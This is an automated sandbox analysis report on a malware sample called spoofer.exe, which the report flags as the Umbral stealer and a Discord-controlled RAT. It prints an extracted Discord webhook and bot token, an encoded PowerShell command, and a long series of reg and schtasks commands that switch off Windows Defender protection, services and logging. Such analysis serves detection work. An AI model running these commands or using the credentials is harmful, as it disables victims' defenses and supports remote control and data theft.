Analysis
max time kernel: 130s
max time network: 134s
platform: windows10-2004_x64
resource: win10v2004-20231222-en
resource tags: arch:x64 arch:x86 image:win10v2004-20231222-en locale:en-us os:windows10-2004-x64 system
submitted: 19/01/2024, 22:21
Static task: static1
Behavioral task behavioral1: sample spoofer.exe, resource win7-20231215-en
Behavioral task behavioral2: sample spoofer.exe, resource win10v2004-20231222-en
General
Target: spoofer.exe
Size: 442KB
MD5: d5a84036071756dee960de255bd6ab94
SHA1: 83b439582a8f3392f18dde97b56d937c518b1cd2
SHA256: 5cac485680e36e9e3cea0867d1373edff3a8995a20d21a2b7aa38247a0a3eb1d
SHA512: fe0dec1e8422d9dd74431ccccff23e7083d356498ff98dc1c5680e1553c5145dbf1c854e48263c5d58a18c87c7bc7016294518ec1491045da7f62c1077a07779
SSDEEP: 12288:3o0NHvykT8QNmJCDWs2qUa3zYgNl3Qc65snvJ:3phFT8QC6WsVUM7NxQcsaJ
Malware Config
Extracted: umbral
https://ptb.discord.com/api/webhooks/1197286741825048616/mPoY62Pti_IE-hGcDYD9Kd5GhKzKQHzuySPby-xlg9GCRDWrviTGJ9au_QMU1pKDVh50
Extracted: discordrat
discord_token: MTE5MzczNzA3MzIzNzE4MDQyNg.GQDWc0.k4Yc3XgNEdmji15f8P6ui2A0sVB2zvpOmkNPlw
server_id: 1196510448573489273
Signatures
Detect Umbral payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x00070000000231ed-32.dat | family_umbral
behavioral2/memory/4448-35-0x000001F50DD20000-0x000001F50DD60000-memory.dmp | family_umbral
Discord RAT
A RAT written in C# using Discord as a C2.
Modifies Windows Defender Real-time Protection settings (10 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Modifies security service (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | spoofer.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation | cleaner.exe
Executes dropped EXE (3 IoCs)
pid | Process
2648 | cleaner.exe
4784 | Spoofer.exe
4448 | Woofer.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
Drops file in Windows directory (3 IoCs)
description | ioc | Process
File created | C:\Windows\cleaner.exe | spoofer.exe
File created | C:\Windows\Spoofer.exe | spoofer.exe
File created | C:\Windows\Woofer.exe | spoofer.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid | Process
4908 | powershell.exe
4908 | powershell.exe
4908 | powershell.exe
Suspicious use of AdjustPrivilegeToken (45 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4784 | Spoofer.exe
Token: SeDebugPrivilege | 4448 | Woofer.exe
Token: SeDebugPrivilege | 4908 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 2620 | wmic.exe
Token: SeSecurityPrivilege | 2620 | wmic.exe
Token: SeTakeOwnershipPrivilege | 2620 | wmic.exe
Token: SeLoadDriverPrivilege | 2620 | wmic.exe
Token: SeSystemProfilePrivilege | 2620 | wmic.exe
Token: SeSystemtimePrivilege | 2620 | wmic.exe
Token: SeProfSingleProcessPrivilege | 2620 | wmic.exe
Token: SeIncBasePriorityPrivilege | 2620 | wmic.exe
Token: SeCreatePagefilePrivilege | 2620 | wmic.exe
Token: SeBackupPrivilege | 2620 | wmic.exe
Token: SeRestorePrivilege | 2620 | wmic.exe
Token: SeShutdownPrivilege | 2620 | wmic.exe
Token: SeDebugPrivilege | 2620 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 2620 | wmic.exe
Token: SeRemoteShutdownPrivilege | 2620 | wmic.exe
Token: SeUndockPrivilege | 2620 | wmic.exe
Token: SeManageVolumePrivilege | 2620 | wmic.exe
Token: 33 | 2620 | wmic.exe
Token: 34 | 2620 | wmic.exe
Token: 35 | 2620 | wmic.exe
Token: 36 | 2620 | wmic.exe
Token: SeIncreaseQuotaPrivilege | 2620 | wmic.exe
Token: SeSecurityPrivilege | 2620 | wmic.exe
Token: SeTakeOwnershipPrivilege | 2620 | wmic.exe
Token: SeLoadDriverPrivilege | 2620 | wmic.exe
Token: SeSystemProfilePrivilege | 2620 | wmic.exe
Token: SeSystemtimePrivilege | 2620 | wmic.exe
Token: SeProfSingleProcessPrivilege | 2620 | wmic.exe
Token: SeIncBasePriorityPrivilege | 2620 | wmic.exe
Token: SeCreatePagefilePrivilege | 2620 | wmic.exe
Token: SeBackupPrivilege | 2620 | wmic.exe
Token: SeRestorePrivilege | 2620 | wmic.exe
Token: SeShutdownPrivilege | 2620 | wmic.exe
Token: SeDebugPrivilege | 2620 | wmic.exe
Token: SeSystemEnvironmentPrivilege | 2620 | wmic.exe
Token: SeRemoteShutdownPrivilege | 2620 | wmic.exe
Token: SeUndockPrivilege | 2620 | wmic.exe
Token: SeManageVolumePrivilege | 2620 | wmic.exe
Token: 33 | 2620 | wmic.exe
Token: 34 | 2620 | wmic.exe
Token: 35 | 2620 | wmic.exe
Token: 36 | 2620 | wmic.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 3968 wrote to memory of 4908 | 3968 | spoofer.exe | 88
PID 3968 wrote to memory of 4908 | 3968 | spoofer.exe | 88
PID 3968 wrote to memory of 4908 | 3968 | spoofer.exe | 88
PID 3968 wrote to memory of 2648 | 3968 | spoofer.exe | 89
PID 3968 wrote to memory of 2648 | 3968 | spoofer.exe | 89
PID 3968 wrote to memory of 4784 | 3968 | spoofer.exe | 91
PID 3968 wrote to memory of 4784 | 3968 | spoofer.exe | 91
PID 3968 wrote to memory of 4448 | 3968 | spoofer.exe | 92
PID 3968 wrote to memory of 4448 | 3968 | spoofer.exe | 92
PID 2648 wrote to memory of 5044 | 2648 | cleaner.exe | 93
PID 2648 wrote to memory of 5044 | 2648 | cleaner.exe | 93
PID 5044 wrote to memory of 2304 | 5044 | cmd.exe | 95
PID 5044 wrote to memory of 2304 | 5044 | cmd.exe | 95
PID 4448 wrote to memory of 2620 | 4448 | Woofer.exe | 96
PID 4448 wrote to memory of 2620 | 4448 | Woofer.exe | 96
PID 5044 wrote to memory of 720 | 5044 | cmd.exe | 98
PID 5044 wrote to memory of 720 | 5044 | cmd.exe | 98
PID 5044 wrote to memory of 2848 | 5044 | cmd.exe | 99
PID 5044 wrote to memory of 2848 | 5044 | cmd.exe | 99
PID 5044 wrote to memory of 408 | 5044 | cmd.exe | 100
PID 5044 wrote to memory of 408 | 5044 | cmd.exe | 100
PID 5044 wrote to memory of 1184 | 5044 | cmd.exe | 103
PID 5044 wrote to memory of 1184 | 5044 | cmd.exe | 103
PID 5044 wrote to memory of 2624 | 5044 | cmd.exe | 102
PID 5044 wrote to memory of 2624 | 5044 | cmd.exe | 102
PID 5044 wrote to memory of 544 | 5044 | cmd.exe | 104
PID 5044 wrote to memory of 544 | 5044 | cmd.exe | 104
PID 5044 wrote to memory of 904 | 5044 | cmd.exe | 105
PID 5044 wrote to memory of 904 | 5044 | cmd.exe | 105
PID 5044 wrote to memory of 3860 | 5044 | cmd.exe | 106
PID 5044 wrote to memory of 3860 | 5044 | cmd.exe | 106
PID 5044 wrote to memory of 1660 | 5044 | cmd.exe | 107
PID 5044 wrote to memory of 1660 | 5044 | cmd.exe | 107
PID 5044 wrote to memory of 4632 | 5044 | cmd.exe | 130
PID 5044 wrote to memory of 4632 | 5044 | cmd.exe | 130
PID 5044 wrote to memory of 3600 | 5044 | cmd.exe | 129
PID 5044 wrote to memory of 3600 | 5044 | cmd.exe | 129
PID 5044 wrote to memory of 4940 | 5044 | cmd.exe | 128
PID 5044 wrote to memory of 4940 | 5044 | cmd.exe | 128
PID 5044 wrote to memory of 4944 | 5044 | cmd.exe | 109
PID 5044 wrote to memory of 4944 | 5044 | cmd.exe | 109
PID 5044 wrote to memory of 3136 | 5044 | cmd.exe | 108
PID 5044 wrote to memory of 3136 | 5044 | cmd.exe | 108
PID 5044 wrote to memory of 2776 | 5044 | cmd.exe | 110
PID 5044 wrote to memory of 2776 | 5044 | cmd.exe | 110
PID 5044 wrote to memory of 380 | 5044 | cmd.exe | 111
PID 5044 wrote to memory of 380 | 5044 | cmd.exe | 111
PID 5044 wrote to memory of 3432 | 5044 | cmd.exe | 112
PID 5044 wrote to memory of 3432 | 5044 | cmd.exe | 112
PID 5044 wrote to memory of 4000 | 5044 | cmd.exe | 113
PID 5044 wrote to memory of 4000 | 5044 | cmd.exe | 113
PID 5044 wrote to memory of 4132 | 5044 | cmd.exe | 114
PID 5044 wrote to memory of 4132 | 5044 | cmd.exe | 114
PID 5044 wrote to memory of 4732 | 5044 | cmd.exe | 117
PID 5044 wrote to memory of 4732 | 5044 | cmd.exe | 117
PID 5044 wrote to memory of 864 | 5044 | cmd.exe | 116
PID 5044 wrote to memory of 864 | 5044 | cmd.exe | 116
PID 5044 wrote to memory of 4796 | 5044 | cmd.exe | 115
PID 5044 wrote to memory of 4796 | 5044 | cmd.exe | 115
PID 5044 wrote to memory of 4176 | 5044 | cmd.exe | 127
PID 5044 wrote to memory of 4176 | 5044 | cmd.exe | 127
PID 5044 wrote to memory of 2168 | 5044 | cmd.exe | 125
PID 5044 wrote to memory of 2168 | 5044 | cmd.exe | 125
PID 5044 wrote to memory of 3160 | 5044 | cmd.exe | 118
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
depth | image | command line | PID
1 | C:\Users\Admin\AppData\Local\Temp\spoofer.exe | "C:\Users\Admin\AppData\Local\Temp\spoofer.exe" | 3968
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
2 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAZgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAawBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAdQB1ACMAPgA=" | 4908
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
2 | C:\Windows\cleaner.exe | "C:\Windows\cleaner.exe" | 2648
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
3 | C:\Windows\system32\cmd.exe | "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\466F.tmp\4670.tmp\4671.bat C:\Windows\cleaner.exe" | 5044
- Suspicious use of WriteProcessMemory
4 | C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | 2304
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | 720
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | 2848
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f | 408
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | 2624
- Modifies Windows Defender Real-time Protection settings
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | 1184
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | 544
- Modifies Windows Defender Real-time Protection settings
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | 904
- Modifies Windows Defender Real-time Protection settings
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | 3860
- Modifies Windows Defender Real-time Protection settings
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f | 1660
- Modifies Windows Defender Real-time Protection settings
4 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f | 3136
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f | 4944
4 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f | 2776
4 | C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable | 380
4 | C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable | 3432
4 | C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable | 4000
4 | C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable | 4132
4 | C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f | 4796
4 | C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f | 864
4 | C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable | 4732
4 | C:\Windows\system32\reg.exe | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f | 3160
4 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f | 3840
4 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f | 3412
4 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f | 3580
4 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f | 3544
- Modifies security service
4 | C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f | 2096
4 | C:\Windows\system32\reg.exe | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f | 2168
4 | C:\Windows\system32\reg.exe | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f | 4176
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f | 4940
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f | 3600
4 | C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f | 4632
2 | C:\Windows\Spoofer.exe | "C:\Windows\Spoofer.exe" | 4784
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
2 | C:\Windows\Woofer.exe | "C:\Windows\Woofer.exe" | 4448
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
3 | C:\Windows\System32\Wbem\wmic.exe | "wmic.exe" csproduct get uuid | 2620
- Suspicious use of AdjustPrivilegeToken
1 | C:\Windows\System32\sihclient.exe | C:\Windows\System32\sihclient.exe /cv ynVRKuLpTUmmVNuyUEi97w.0.2 | 3412